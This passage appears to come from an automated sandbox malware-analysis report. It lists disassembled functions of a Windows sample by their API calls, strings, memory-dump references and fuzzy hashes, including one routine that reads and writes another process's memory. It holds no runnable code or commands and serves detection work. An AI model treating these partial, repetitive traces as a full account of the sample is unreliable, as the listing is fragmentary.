                                                                                                                                                          • Associated: 0000000F.00000002.2547467760.00000000001CE000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2547467760.00000000001DA000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2547467760.000000000023E000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2547467760.00000000002C6000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2549955151.00000000002CC000.00000080.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2550284133.00000000002CD000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2550284133.00000000002D4000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2550284133.000000000030D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2550284133.0000000000323000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_15_2_120000_UNK_.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: Path$ObjectStroke$DeleteFillSelect
                                                                                                                                                          • String ID:
                                                                                                                                                          • API String ID: 2625713937-0
                                                                                                                                                          • Opcode ID: 9735c5a25c2a4b63928083ae5e8b3b1c4e1fbe5b48c7541928c2f4bb52ed2ff6
                                                                                                                                                          • Instruction ID: 109192ed8cf71dd4c2b1c33c9c1b70103f7cb3beabc762d3632b50d824969852
                                                                                                                                                          • Opcode Fuzzy Hash: 9735c5a25c2a4b63928083ae5e8b3b1c4e1fbe5b48c7541928c2f4bb52ed2ff6
                                                                                                                                                          • Instruction Fuzzy Hash: 66F0E731104684EBDB195FA5ED8CBA93FE5BB02322F188214F5AA88DF0D73489D6DF11
                                                                                                                                                          Function 0016FA15 Relevance: 7.3, APIs: 3, Strings: 1, Instructions: 277comCOMMON
                                                                                                                                                          Download Yara Rule
                                                                                                                                                          APIs
                                                                                                                                                          • CoInitialize.OLE32(00000000), ref: 0016FAB2
                                                                                                                                                          • CoCreateInstance.COMBASE(001ADA7C,00000000,00000001,001AD8EC,?), ref: 0016FACA
                                                                                                                                                            • Part of subcall function 0012CAEE: _memmove.LIBCMT ref: 0012CB2F
                                                                                                                                                          • CoUninitialize.COMBASE ref: 0016FD2D
                                                                                                                                                          Strings
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 0000000F.00000002.2547467760.0000000000121000.00000040.00000001.01000000.00000009.sdmp, Offset: 00120000, based on PE: true
                                                                                                                                                          • Associated: 0000000F.00000002.2547158277.0000000000120000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2547467760.00000000001CE000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2547467760.00000000001DA000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2547467760.000000000023E000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2547467760.00000000002C6000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2549955151.00000000002CC000.00000080.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2550284133.00000000002CD000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2550284133.00000000002D4000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2550284133.000000000030D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2550284133.0000000000323000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_15_2_120000_UNK_.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: CreateInitializeInstanceUninitialize_memmove
                                                                                                                                                          • String ID: .lnk
                                                                                                                                                          • API String ID: 2683427295-24824748
                                                                                                                                                          • Opcode ID: 71687af3014f13e372fd245138a608fe852abed3c93a2225afa531250b7768d2
                                                                                                                                                          • Instruction ID: 8b0def6bd2b135372a1719ca974877400e4e5eae0fd830538931d260f5af2878
                                                                                                                                                          • Opcode Fuzzy Hash: 71687af3014f13e372fd245138a608fe852abed3c93a2225afa531250b7768d2
                                                                                                                                                          • Instruction Fuzzy Hash: F6A15A72504301AFD300EF64DC91EABB7EDAFA8704F40492DF155971A2EB70EA19CB92
                                                                                                                                                          Function 0013DA5A Relevance: 7.2, APIs: 2, Strings: 2, Instructions: 162COMMON
                                                                                                                                                          Download Yara Rule
                                                                                                                                                          Strings
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 0000000F.00000002.2547467760.0000000000121000.00000040.00000001.01000000.00000009.sdmp, Offset: 00120000, based on PE: true
                                                                                                                                                          • Associated: 0000000F.00000002.2547158277.0000000000120000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2547467760.00000000001CE000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2547467760.00000000001DA000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2547467760.000000000023E000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2547467760.00000000002C6000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2549955151.00000000002CC000.00000080.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2550284133.00000000002CD000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2550284133.00000000002D4000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2550284133.000000000030D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2550284133.0000000000323000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_15_2_120000_UNK_.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID:
                                                                                                                                                          • String ID: #$+
                                                                                                                                                          • API String ID: 0-2552117581
                                                                                                                                                          • Opcode ID: 899c66b255ced128a60a81d84bd0107ee76df39e61c05568b6a06bc376633d75
                                                                                                                                                          • Instruction ID: 9038bd415fec5d9ea29723be5c675d7f05c8e7e7653faa7c04625e72b6da8e27
                                                                                                                                                          • Opcode Fuzzy Hash: 899c66b255ced128a60a81d84bd0107ee76df39e61c05568b6a06bc376633d75
                                                                                                                                                          • Instruction Fuzzy Hash: 9D511D74504256CFDF25EF68F480AFABBA4BF2A310F154056F8829B2A0D7309D86CB20
                                                                                                                                                          Function 0016503C Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 122COMMON
                                                                                                                                                          Download Yara Rule
                                                                                                                                                          APIs
                                                                                                                                                          • CharUpperBuffW.USER32(0000000C,00000016,00000016,00000000,00000000,?,00000000,001BDC40,?,0000000F,0000000C,00000016,001BDC40,?), ref: 0016507B
                                                                                                                                                            • Part of subcall function 001284A6: __swprintf.LIBCMT ref: 001284E5
                                                                                                                                                            • Part of subcall function 001284A6: __itow.LIBCMT ref: 00128519
                                                                                                                                                            • Part of subcall function 0012B8A7: _memmove.LIBCMT ref: 0012B8FB
                                                                                                                                                          • CharUpperBuffW.USER32(?,?,00000000,?), ref: 001650FB
                                                                                                                                                          Strings
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 0000000F.00000002.2547467760.0000000000121000.00000040.00000001.01000000.00000009.sdmp, Offset: 00120000, based on PE: true
                                                                                                                                                          • Associated: 0000000F.00000002.2547158277.0000000000120000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2547467760.00000000001CE000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2547467760.00000000001DA000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2547467760.000000000023E000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2547467760.00000000002C6000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2549955151.00000000002CC000.00000080.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2550284133.00000000002CD000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2550284133.00000000002D4000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2550284133.000000000030D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2550284133.0000000000323000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_15_2_120000_UNK_.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: BuffCharUpper$__itow__swprintf_memmove
                                                                                                                                                          • String ID: REMOVE$THIS
                                                                                                                                                          • API String ID: 2528338962-776492005
                                                                                                                                                          • Opcode ID: 57d7bc2c6ab22f8ccca72fa46a6cfd7fa2c5d8262edd3ad9ccfa1aa04c9b1071
                                                                                                                                                          • Instruction ID: 004b1bdba7ed7654c4bf76905f252e3a89834be879c735389b9eb00a7d852233
                                                                                                                                                          • Opcode Fuzzy Hash: 57d7bc2c6ab22f8ccca72fa46a6cfd7fa2c5d8262edd3ad9ccfa1aa04c9b1071
                                                                                                                                                          • Instruction Fuzzy Hash: A441B074A00619AFCF05EF64DC81BAEB7B6BF59304F048069E856AB352DB34DD61CB50
                                                                                                                                                          Function 0015CF7F Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 121windowCOMMON
                                                                                                                                                          Download Yara Rule
                                                                                                                                                          APIs
                                                                                                                                                            • Part of subcall function 00164D41: WriteProcessMemory.KERNEL32(?,?,?,00000000,00000000,00000000,?,0015C9FE,?,?,00000034,00000800,?,00000034), ref: 00164D6B
                                                                                                                                                          • SendMessageW.USER32(?,00001104,00000000,00000000), ref: 0015CFC9
                                                                                                                                                            • Part of subcall function 00164D0C: ReadProcessMemory.KERNEL32(?,?,?,00000000,00000000,00000000,?,0015CA2D,?,?,00000800,?,00001073,00000000,?,?), ref: 00164D36
                                                                                                                                                            • Part of subcall function 00164C65: GetWindowThreadProcessId.USER32(?,?), ref: 00164C90
                                                                                                                                                            • Part of subcall function 00164C65: OpenProcess.KERNEL32(00000438,00000000,?,?,?,0015C9C2,00000034,?,?,00001004,00000000,00000000), ref: 00164CA0
                                                                                                                                                            • Part of subcall function 00164C65: VirtualAllocEx.KERNEL32(00000000,00000000,?,00001000,00000004,?,?,0015C9C2,00000034,?,?,00001004,00000000,00000000), ref: 00164CB6
                                                                                                                                                          • SendMessageW.USER32(?,00001111,00000000,00000000), ref: 0015D036
                                                                                                                                                          • SendMessageW.USER32(?,00001111,00000000,00000000), ref: 0015D083
                                                                                                                                                          Strings
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 0000000F.00000002.2547467760.0000000000121000.00000040.00000001.01000000.00000009.sdmp, Offset: 00120000, based on PE: true
                                                                                                                                                          • Associated: 0000000F.00000002.2547158277.0000000000120000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2547467760.00000000001CE000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2547467760.00000000001DA000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2547467760.000000000023E000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2547467760.00000000002C6000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2549955151.00000000002CC000.00000080.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2550284133.00000000002CD000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2550284133.00000000002D4000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2550284133.000000000030D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2550284133.0000000000323000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_15_2_120000_UNK_.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: Process$MessageSend$Memory$AllocOpenReadThreadVirtualWindowWrite
                                                                                                                                                          • String ID: @
                                                                                                                                                          • API String ID: 4150878124-2766056989
                                                                                                                                                          • Opcode ID: 5493d3da760ba062fb6a0d56e4f15ff3acc4748fa6b22eff7a35e6d0763bcaad
                                                                                                                                                          • Instruction ID: 30cc1a016c5760fc5db5a8a34dc13dd241b82e44a2d8d9e9fa4ad612acb9acc0
                                                                                                                                                          • Opcode Fuzzy Hash: 5493d3da760ba062fb6a0d56e4f15ff3acc4748fa6b22eff7a35e6d0763bcaad
                                                                                                                                                          • Instruction Fuzzy Hash: 34413C72900218AFDB10DFA4DC81AEEBBB8AF19700F104095FA55BB191DB706E99CB61
                                                                                                                                                          Function 0018A44D Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 110COMMON
                                                                                                                                                          Download Yara Rule
                                                                                                                                                          APIs
                                                                                                                                                          • SetWindowPos.USER32(00000000,00000000,00000000,00000000,00000000,00000000,00000013,?,?,SysTreeView32,001BDBF0,00000000,?,?,?,?), ref: 0018A4E6
                                                                                                                                                          • GetWindowLongW.USER32 ref: 0018A503
                                                                                                                                                          • SetWindowLongW.USER32(?,000000F0,00000000), ref: 0018A513
                                                                                                                                                          Strings
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 0000000F.00000002.2547467760.0000000000121000.00000040.00000001.01000000.00000009.sdmp, Offset: 00120000, based on PE: true
                                                                                                                                                          • Associated: 0000000F.00000002.2547158277.0000000000120000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2547467760.00000000001CE000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2547467760.00000000001DA000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2547467760.000000000023E000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2547467760.00000000002C6000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2549955151.00000000002CC000.00000080.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2550284133.00000000002CD000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2550284133.00000000002D4000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2550284133.000000000030D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2550284133.0000000000323000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_15_2_120000_UNK_.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: Window$Long
                                                                                                                                                          • String ID: SysTreeView32
                                                                                                                                                          • API String ID: 847901565-1698111956
                                                                                                                                                          • Opcode ID: 0123db462bec0a0e16a097595986d9fe535b08d593314c5d8aca91881112e8c2
                                                                                                                                                          • Instruction ID: f3c7014ee6300ea32c1f9c6d3c23881ab9a7a29ca543d633c801785aaa341a17
                                                                                                                                                          • Opcode Fuzzy Hash: 0123db462bec0a0e16a097595986d9fe535b08d593314c5d8aca91881112e8c2
                                                                                                                                                          • Instruction Fuzzy Hash: 8B31B031200605AFEF11AF38DC45BEA7BA9EF49324F244726F975A32E1D770E9909B50
                                                                                                                                                          Function 0018A698 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 88windowCOMMON
                                                                                                                                                          Download Yara Rule
                                                                                                                                                          APIs
                                                                                                                                                          • SendMessageW.USER32(00000000,00000469,?,00000000), ref: 0018A74F
                                                                                                                                                          • SendMessageW.USER32(00000000,00000465,00000000,80017FFF), ref: 0018A75D
                                                                                                                                                          • DestroyWindow.USER32(00000000,00000000,?,?,?,00000000,msctls_updown32,00000000,00000000,00000000,00000000,00000000,00000000,?,?,00000000), ref: 0018A764
                                                                                                                                                          Strings
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 0000000F.00000002.2547467760.0000000000121000.00000040.00000001.01000000.00000009.sdmp, Offset: 00120000, based on PE: true
                                                                                                                                                          • Associated: 0000000F.00000002.2547158277.0000000000120000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2547467760.00000000001CE000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2547467760.00000000001DA000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2547467760.000000000023E000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2547467760.00000000002C6000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2549955151.00000000002CC000.00000080.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2550284133.00000000002CD000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2550284133.00000000002D4000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2550284133.000000000030D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2550284133.0000000000323000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_15_2_120000_UNK_.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: MessageSend$DestroyWindow
                                                                                                                                                          • String ID: msctls_updown32
                                                                                                                                                          • API String ID: 4014797782-2298589950
                                                                                                                                                          • Opcode ID: 377dc42f7189aff45dfbc1cd643ec53b378689ab3ae0b0eaf86c8896442d4883
                                                                                                                                                          • Instruction ID: a5d0b5d7451ce9bf3aee26e93b7abcaf36df314a102e8464d31b8bf2ff812185
                                                                                                                                                          • Opcode Fuzzy Hash: 377dc42f7189aff45dfbc1cd643ec53b378689ab3ae0b0eaf86c8896442d4883
                                                                                                                                                          • Instruction Fuzzy Hash: CD21AEB5600205BFEB00EF64DCC1EAB37ADEF5A394B54001AFA019B291CB71ED51DBA1
                                                                                                                                                          Function 001897B2 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 84windowCOMMON
                                                                                                                                                          Download Yara Rule
                                                                                                                                                          APIs
                                                                                                                                                          • SendMessageW.USER32(00000000,00000180,00000000,?), ref: 0018983D
                                                                                                                                                          • SendMessageW.USER32(?,00000186,00000000,00000000), ref: 0018984D
                                                                                                                                                          • MoveWindow.USER32(?,?,?,?,?,00000000,?,?,Listbox,00000000,00000000,?,?,?,?,?), ref: 00189872
                                                                                                                                                          Strings
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 0000000F.00000002.2547467760.0000000000121000.00000040.00000001.01000000.00000009.sdmp, Offset: 00120000, based on PE: true
                                                                                                                                                          • Associated: 0000000F.00000002.2547158277.0000000000120000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2547467760.00000000001CE000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2547467760.00000000001DA000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2547467760.000000000023E000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2547467760.00000000002C6000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2549955151.00000000002CC000.00000080.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2550284133.00000000002CD000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2550284133.00000000002D4000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2550284133.000000000030D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2550284133.0000000000323000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_15_2_120000_UNK_.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: MessageSend$MoveWindow
                                                                                                                                                          • String ID: Listbox
                                                                                                                                                          • API String ID: 3315199576-2633736733
                                                                                                                                                          • Opcode ID: 86e1af85ef4075bbdccaf87a78dc421280633347b6087d507cd9f5d6b487812c
                                                                                                                                                          • Instruction ID: 418505322401a1ec91954af5f81ff7cf08eda324acd2d33488ea755bcbab469a
                                                                                                                                                          • Opcode Fuzzy Hash: 86e1af85ef4075bbdccaf87a78dc421280633347b6087d507cd9f5d6b487812c
                                                                                                                                                          • Instruction Fuzzy Hash: 5321D132610118BFEF129F54DC85FBB3BAAEF8A754F018124F905AB190CB71AD518FA0
                                                                                                                                                          Function 0018A217 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 66windowCOMMON
                                                                                                                                                          Download Yara Rule
                                                                                                                                                          APIs
                                                                                                                                                          • SendMessageW.USER32(00000000,00000405,00000000,00000000), ref: 0018A27B
                                                                                                                                                          • SendMessageW.USER32(?,00000406,00000000,00640000), ref: 0018A290
                                                                                                                                                          • SendMessageW.USER32(?,00000414,0000000A,00000000), ref: 0018A29D
                                                                                                                                                          Strings
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 0000000F.00000002.2547467760.0000000000121000.00000040.00000001.01000000.00000009.sdmp, Offset: 00120000, based on PE: true
                                                                                                                                                          • Associated: 0000000F.00000002.2547158277.0000000000120000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2547467760.00000000001CE000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2547467760.00000000001DA000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2547467760.000000000023E000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2547467760.00000000002C6000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2549955151.00000000002CC000.00000080.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2550284133.00000000002CD000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2550284133.00000000002D4000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2550284133.000000000030D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2550284133.0000000000323000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_15_2_120000_UNK_.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: MessageSend
                                                                                                                                                          • String ID: msctls_trackbar32
                                                                                                                                                          • API String ID: 3850602802-1010561917
                                                                                                                                                          • Opcode ID: 5ba495ba4a2fc75ec702fc9cd6cd07224f26d80cefed7c1553f77209e4380744
                                                                                                                                                          • Instruction ID: fe896086c429af8a2d743b367623d929832227d1af6e6acac24e4d7a8a70ac72
                                                                                                                                                          • Opcode Fuzzy Hash: 5ba495ba4a2fc75ec702fc9cd6cd07224f26d80cefed7c1553f77209e4380744
                                                                                                                                                          • Instruction Fuzzy Hash: 0E11E371200208BBEB246F65CC46FAB3BA9EF89B54F024219FA45A6190D372A851CF60
                                                                                                                                                          Function 00142F5F Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 24libraryCOMMONLIBRARYCODE
                                                                                                                                                          Download Yara Rule
                                                                                                                                                          APIs
                                                                                                                                                          • LoadLibraryExW.KERNEL32(combase.dll,00000000,00000800,RoInitialize,?,?,00142F11,00000000), ref: 00142F79
                                                                                                                                                          • 6CA06DE0.KERNEL32(00000000,?,?,00142F11,00000000), ref: 00142F80
                                                                                                                                                          Strings
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 0000000F.00000002.2547467760.0000000000121000.00000040.00000001.01000000.00000009.sdmp, Offset: 00120000, based on PE: true
                                                                                                                                                          • Associated: 0000000F.00000002.2547158277.0000000000120000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2547467760.00000000001CE000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2547467760.00000000001DA000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2547467760.000000000023E000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2547467760.00000000002C6000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2549955151.00000000002CC000.00000080.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2550284133.00000000002CD000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2550284133.00000000002D4000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2550284133.000000000030D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2550284133.0000000000323000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_15_2_120000_UNK_.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: LibraryLoad
                                                                                                                                                          • String ID: RoInitialize$combase.dll
                                                                                                                                                          • API String ID: 1029625771-340411864
                                                                                                                                                          • Opcode ID: 679a612aaf26985c5ab0aee05308a5f62e921bf7d9322f97999f21f5a9d909a0
                                                                                                                                                          • Instruction ID: cc77791b431afe909c926d434095533774200ad9a9bd1ed10ba0a93818563bfb
                                                                                                                                                          • Opcode Fuzzy Hash: 679a612aaf26985c5ab0aee05308a5f62e921bf7d9322f97999f21f5a9d909a0
                                                                                                                                                          • Instruction Fuzzy Hash: 2DE01A74695350ABDB115FB0FC89B593764AB09706F814024F102DACB0CBF980C4DF08
                                                                                                                                                          Function 00143034 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 19libraryCOMMONLIBRARYCODE
                                                                                                                                                          Download Yara Rule
                                                                                                                                                          APIs
                                                                                                                                                          • LoadLibraryExW.KERNEL32(combase.dll,00000000,00000800,RoUninitialize,00142F4E), ref: 0014304E
                                                                                                                                                          • 6CA06DE0.KERNEL32(00000000), ref: 00143055
                                                                                                                                                          Strings
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 0000000F.00000002.2547467760.0000000000121000.00000040.00000001.01000000.00000009.sdmp, Offset: 00120000, based on PE: true
                                                                                                                                                          • Associated: 0000000F.00000002.2547158277.0000000000120000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2547467760.00000000001CE000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2547467760.00000000001DA000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2547467760.000000000023E000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2547467760.00000000002C6000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2549955151.00000000002CC000.00000080.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2550284133.00000000002CD000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2550284133.00000000002D4000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2550284133.000000000030D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2550284133.0000000000323000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          Joe Sandbox IDA Plugin
